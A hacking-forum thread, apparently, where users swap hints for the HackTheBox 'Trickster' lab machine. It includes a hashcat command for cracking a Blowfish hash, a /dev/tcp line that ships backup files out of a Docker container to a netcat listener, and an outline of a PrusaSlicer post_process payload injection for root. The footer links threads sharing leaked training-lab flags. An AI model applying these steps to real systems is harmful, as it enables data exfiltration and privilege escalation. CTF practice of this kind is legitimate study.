Sep 26, 2024, 05:28 AM
Can someone explain to me what kind of hash that is in the sql database and with what flags on hashcat you would crack it? I know whats its cracked to but I am interested in how thats done
|
Hackthbox Trickster Linux - Medium
by selukas - Wednesday September 18, 2024 at 06:22 PM
|
|
Sep 26, 2024, 05:28 AM
Can someone explain to me what kind of hash that is in the sql database and with what flags on hashcat you would crack it? I know whats its cracked to but I am interested in how thats done
Sep 27, 2024, 06:21 PM
The PoC not working...
Tried everything.. This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Accusing forum user of being a fraudster without making any deal
Sep 28, 2024, 01:56 AM
(Sep 26, 2024, 05:28 AM)russairussi3 Wrote: Can someone explain to me what kind of hash that is in the sql database and with what flags on hashcat you would crack it? I know whats its cracked to but I am interested in how thats done Hey, I don’t know if you found your answer yet, but you can identify the hash type with hashid or hash-identifier in your Linux console. Once you have the returned hash type, you can search for it using hashcat -h | grep <typeOfHash>. This will give you the possible numbers for the hash mode in Hashcat. Since it's Blowfish, the hash mode for Hashcat is 3200. So, you can run: hashcat -m 3200 -a 0 hash.txt wordlist.txt
Sep 28, 2024, 07:54 AM
(Sep 23, 2024, 05:21 AM)Est_Damty Wrote:(Sep 22, 2024, 12:52 AM)random901 Wrote: For triggering launch of Root PoC: In the step 2 use http://<your IP>:<your python server port>. And it works for me!!
Sep 28, 2024, 02:11 PM
rooted, thank everyone for hints
Oct 06, 2024, 05:09 PM
any hints on getting root...looks like theres a docker breakout but cant figure it out...
(Oct 06, 2024, 05:09 PM)Com41n Wrote: any hints on getting root...looks like theres a docker breakout but cant figure it out... It got patched, root passwd used to be in the .bash_history in the comtainer and has been changed I believe this is the intended: https://www.exploit-db.com/exploits/51983
Oct 12, 2024, 04:55 AM
root from docker container:
inside container in /datastore/Backups you have zip files. transfer out with `cat backupfile.zip > /dev/tcp/172.17.0.1/port` to a nc listener as james You can then move files to your machine and run brotli -d on a .txt.br file to find adams password for ssh Once it prusa exploit: https://www.exploit-db.com/exploits/51983 I use 7zip to edit file to include payload. Make sure to fix file with "; output_filename_format = something.gcode" as well ![]() Then run slicer and win
Oct 15, 2024, 03:40 PM
(Oct 12, 2024, 04:55 AM)fuckedupindacrib Wrote: root from docker container: Could you give a little more details for the last exploit around prusa ? I understand I need to write the payload into the Slic3r_PE.config file and re-zip the .3mf file. What I don't understand is the syntax you need as Slic3r_PE.config is an XML file, and I don't find any documentation about how you define the post_process feature in this XML file...
Oct 16, 2024, 01:00 AM
(Oct 15, 2024, 03:40 PM)ploplopfr Wrote:(Oct 12, 2024, 04:55 AM)fuckedupindacrib Wrote: root from docker container: Use the 3mf file from the box. You should be able to ctrl+f to find the post_process and output_filename_format to edit. |
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| Hack the box Pro Labs, VIP, VIP+ 1 month free Method | 23 | 2,167 |
1 hour ago Last Post: kkkato |
||
| [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags | 20 | 2,491 |
Yesterday, 11:06 PM Last Post: op334 |
||
|
|
[FREE] HackTheBox All Cheatsheets | 3 | 396 |
Yesterday, 10:36 PM Last Post: op334 |
|
| [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired | 369 | 92,002 |
Yesterday, 04:10 PM Last Post: sabbyahmed |
||
| CBBH Write Ups | 22 | 6,226 |
Yesterday, 06:39 AM Last Post: Usercomplex |
||